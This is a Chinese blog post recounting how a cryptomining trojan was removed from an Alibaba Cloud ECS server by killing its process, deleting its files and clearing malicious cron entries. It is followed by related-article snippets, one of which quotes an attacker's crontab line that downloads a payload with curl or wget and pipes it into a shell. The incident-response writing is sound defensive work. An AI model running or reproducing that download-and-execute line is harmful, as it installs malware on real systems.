记一次阿里云ECS被挂挖矿代码的处理历程

最新推荐文章于 2024-05-26 18:21:37 发布
原创 最新推荐文章于 2024-05-26 18:21:37 发布 · 1.7k 阅读 · 4 ·
本内容遵循CC 4.0 BY-SA版权协议
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文记录了处理阿里云ECS服务器遭受恶意下载源攻击的过程,详细介绍了从发现安全事件、查找并终止可疑进程,到彻底清除挖矿木马、修复定时任务的完整步骤。

起因:

公司手机收到阿里云提示短信,检测到ECS服务器出现紧急安全事件:访问恶意下载源

于是访问阿里云管理平台查看到如下信息

 

处理过程一:

连接到服务器,htop查看到有可疑进程,吃掉了服务器2vcpu中的1个

上网搜了一下ackng.com确认了这是一个挖矿木马程序

于是就先kill杀掉进程

然后通过find查找到了./xr所在目录 /.Xll

rm -rf /.Xll

删除该目录及目录内所有文件

继续htop观察,cpu确实降下来了

然而,过了几分钟时间后,cpu又有一个被占满了,刚才删除的/.Xll/xr又回来了

处理过程二:

这时候,一般就能猜到,一定有什么东西能让木马程序复制或者重新下载,怀疑是个定时任务

于是我先去阿里云改了一下密码,重启服务器,

然后发现该进程在我重新连上服务器之前就自己启动了

发现在个进程前面,有一个CROND ,说明确实有定时任务

于是接下来主要就是要找到这个定时任务

通过 systemctl list-unit-files|grep enabled

能看到有个crond.service定时服务

所以上网看了下crond服务的配置文件位置

vim /etc/crontab 打开查看

抓到了!

这里有多条黄色字,就是被添加的自动执行程序

定时执行curl下载木马、启动的指令

删除这些指令,保存配置

而后,重新杀死木马进程,删除木马程序

service crond restart 重新启动定时服务

这次挖矿代码没有自动复活了

保险起见,再次修改了服务器密码

重启服务器,观察了一阵子没有奇怪的进程了

Done!

解决 ECS 服务器中了挖矿木马问题,处理和解决方案
简简单单Onlinezuozuo
02-02 1572
文章目录解决 ECS 服务器中了挖矿木马问题,处理和解决方案1、监控 CPU 占用2、查看定时任务3、解决方案4、保守解决方案5、mysql 无法启动的情况 解决 ECS 服务器中了挖矿木马问题,处理和解决方案 1、监控 CPU 占用 top 显示一次后,立马消失,但是监控到的占用是 100% 因为进程被隐藏,或者有守护进程 2、查看定时任务 crontab -l 会发现存在定时任务 3、解决方案 删掉定时任务 rm -rf /etc/cron.d/root rm -rf /var/spool/cr
阿里云ECS挖矿程序攻击解决方法(彻底清除挖矿程序,顺便下载了挖矿程序的脚本)
NicolasLearner的博客
07-22 5944
一:杀死挖矿程序进程 在服务器上使用top指令查看cpu的使用情况,发现有一个叫java的程序占用cpu高达99.9% PID USER PR NI VIRT RES SHR S %CPU %MEM TIME+ COMMAND 5778 root 20 0 373576 2720 404 S 99.9 0.1 1252:00 java
一次阿里云服务器ECS流出带宽占满的解决过程
wangzhihao的博客
08-14 1万+
情况: 买了台阿里云服务器当测试服务器,突然有一天访问云服务器的速度特慢,什么东西都加载不出来。于是向阿里云提了工单,售后工程师告诉我是流出带宽占满了,于是在云主机的监控页面查看流出带宽指标,下图所示: 由于我是1Mbps的配置,所以理所当然带宽被占满了,访问该云主机就非常的卡顿。 下面说说如何解决该情况的: 使用iftop查看云主机网络流量情况 修改安全组配置 首先是在云主机上使用远程连接...
我的阿里云服务器发现被中【挖矿程序病毒】 的解决处理
本博客记录了从2014年以来在工作学习中遇到的技术问题、解决方法以及部分个人人生经历、经验等内容。
03-20 2737
但两天后发现又出现了相同的报警,上服务器再看了一下,服务器负载正常, 文件修改上只是定时任务文件被改写,看了一下账户录, 发现一些我没什么印象的用户,感觉不像是我加的。再就是对定时任务文件添加了一些特殊权限。这有一天有空就上来看看,登录服务器后,一看问题大了,整个服务器的定时任务被改写了,成了乱码,检查一下其它的程序到还正常,不过打开网站发现突然很慢了,不错,是中毒了,门罗币(XMR)挖矿程序。这时基本的文件修改是改正过来了,但是服务器发现有些慢,找到了一个很耗CPU的进程zigw,杀掉了,
阿里云挖矿病毒解决
weixin_39766667的博客
02-20 3048
一次,我们在阿里上的服务器收到这样的短信。【阿里云】尊敬的xxxxxx:经检测您的阿里云服务(ECS实例)xxxxxxxx存在挖矿活动。根据相关法规、政策的规定及监管部门的要求,请您于2023-02-27 00时前完成挖矿问题整改,否则您的服务将被关停,详情请查看邮件或阿里云站内消息通知。若您有其他问题,可登陆阿里云官网在线咨询这就是中了挖矿病毒,如何处理它?
一次服务器被挖矿的排查过程:xmrig挖矿病毒
热门推荐
矮矮的夏祭的专栏
07-11 1万+
服务器被挖矿录一下清除xmrig挖矿病毒的解决过程
解决阿里云Ecs提示有挖矿程序
小薯条的博客
07-22 4191
背景 自己买了一台阿里云Ecs学生机用来玩玩,已经好久没有管了,最近每天凌成三点阿里云发短信提示出现紧急安全事件:挖矿程序,建议紧急处理。实在受不了了,登录阿里云查看了一下监控,所有指标正常,网上所说的肉机特征完全没有出现,但是短信天天提醒,MD只能继续处理一下 症状 先top free df看一下,老铁没毛病啊,然后还是发现了一些异常文件,当时没有截图,导致大家看不了,于是赶紧一顿rm * -...
阿里云提示ECS实例存在挖矿活动的处理
格物致知的专栏 [音视频编解码 网络协议 计算机视觉 计算机图形学 图像理解 语音识别 机器学习 模拟电路 传感器]
04-18 4194
今天接到阿里云的电话语音提醒,说是经检测你有一台云服务器实例存在挖矿活动,要求尽快处理。对此,我有两个疑问,一是阿里云怎么知道的,二是如何处理这种问题。 先用ssh登录到云服务器看看再说。使用“top -c”命令看一下哪个进程占用的cpu和memory最高,发现也没有啊,看来这个挖矿进程没有工作呢!接着再用“ps -ef”看一下有哪些进程。结果让我吓一跳,出现很多下面的: root 15081 922 0 13:56 ? 00:00:00 CROND root 1
Linux中挖矿病毒清理通用思路
qq_53058639的博客
02-28 1605
在被植入挖矿病毒后,如果攻击者拥有足够的权限,比如root权限,往往会对系统命令进行劫持,达到隐藏自己的效果,故第一步最好是先确认是否存在rootkit劫持、库劫持,之后的命令执行操作也最好是通过busybox执行。
【解决】ECS测试集群遭遇挖矿程序攻击
Moody的博客
09-09 524
[root@hadoop1 sbin]# crontab -l */10 * * * * (curl -fsSL --retry 3 -m180 "http://dl.djangocc.com:8080/p?a=p&a2=cron"||wget -q --tries=3 -T180 -O- "http://dl.djangocc.com:8080/p?a=p&a2=cron")|s...
【Linux】一次服务器被挖矿(lambsys和procq)
Purepil的博客
05-26 945
周五凌晨一台测试服务器被挖矿了,根据挖矿进程相关的文件lambsys和procq搜索没有搜到相关的东西,也是弄了好久。没想到第二天又有一台服务器被挖了,因此录一下。注意:只针对该种挖矿,且治标不治本。如果知道如何入侵的,希望能告知top -c显示进程和占用top -c。
Ubuntu | ERROR: ld.so: object ‘/usr/lib64/libthread.so.1‘ from /etc/ld.so.preload cannot be preloade
我是一块小石头
02-07 4200
错误一览 ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be preloaded (cannot open shared object file): ignored. root@xxx:~# root@xxx:~# ls ERROR: ld.so: object '/usr/lib64/libthread.so.1' from /etc/ld.so.preload cannot be prel
解决阿里云服务器被植入挖矿脚本过程
拽着尾巴的鱼儿的博客
06-21 6018
基于学习的便利性,在阿里云服务中购买了云服务器,但是突然被告警提示被挖矿,而且要在一定期限内解决挖矿问题,否则就会被关停服务,本篇对于其处理过程进行一个录,可能对于挖矿处理也不全面,欢迎各路大神进行评论交流。以上就是今天要讲的内容,本文仅仅简单录了处理服务器挖矿的流程,录的不全面,欢迎各路大神探讨交流。
阿里云服务器被挖矿的解决方法
qq_47464056的博客
07-25 5333
云服务器被入侵植入挖矿程序!
linux系统性能监控工具--htop与dstat介绍
weixin_34109408的博客
06-10 306
目录一、htop工具使用简介二、dstat工具使用简介 此博文针对linux系统介绍两款常用系统性能监控软件的基本使用,对于Linux系统我们一般要监控的对象有进程、cpu、内存、磁盘IO、swap、网卡等。(一)htop工具使用简介 htop是一个比top更为易用,功能更强大的交互式进程查看器,是一个免费的,遵循GPL协定的,针对于Linux的进程查看器。还能实...
阿里云——云安全中心安全事件提醒:挖矿程序
iamcool345的博客
05-22 6191
近日收到云安全中心安全事件提醒,“出现了紧急安全事件:挖矿程序,建议您立即登录查看事件详情,并根据事件建议的方案进行处理。” 登录服务器后用top命令查看CPU利用率并不高,感觉不一定真是挖矿程序在作怪,或挖矿还没启动。用ps -ef命令列出进程,发现一个名为“httpdz”的可疑进程,杀死进程后,这个httpdz又立即启动。 查阅/etc/crontab、/etc/cron.d和/var/s...
阿里云被恶意挖矿处理方法
qq_55809729的博客
10-03 1257
亲测:阿里云被恶意挖矿处理方法
服务器被黑客攻击,用来挖矿!怎么办?
wuli1024的博客
12-29 2044
昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。
一次真实的挖矿病毒应急响应】
一纸荒芜的博客
03-25 8572
分享一起真实的挖矿病毒应急响应案例
服务器被黑客攻击,用来挖矿,怎么办?
m0_63171455的博客
02-23 3115
昨天下午一个朋友和我说,他的服务器被阿里云监测出来在挖矿,然后阿里云官方把服务器给关停了。 不用急,这个时候最简单的方法是在阿里云里提一个工单,反馈相关问题。编程学习资料点击免费领取 解禁服务器 要解决问题、排查删除挖矿程序,首先我们需要解禁服务器,登录阿里云官方平台后,依次点击控制台->个人头像->安全管控进入相关页面。 在处罚列表,我们可以看到相关处罚录,点击解除封禁后即可正常进入服务器了。 会有提示,需要在解禁后三日内找到挖...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值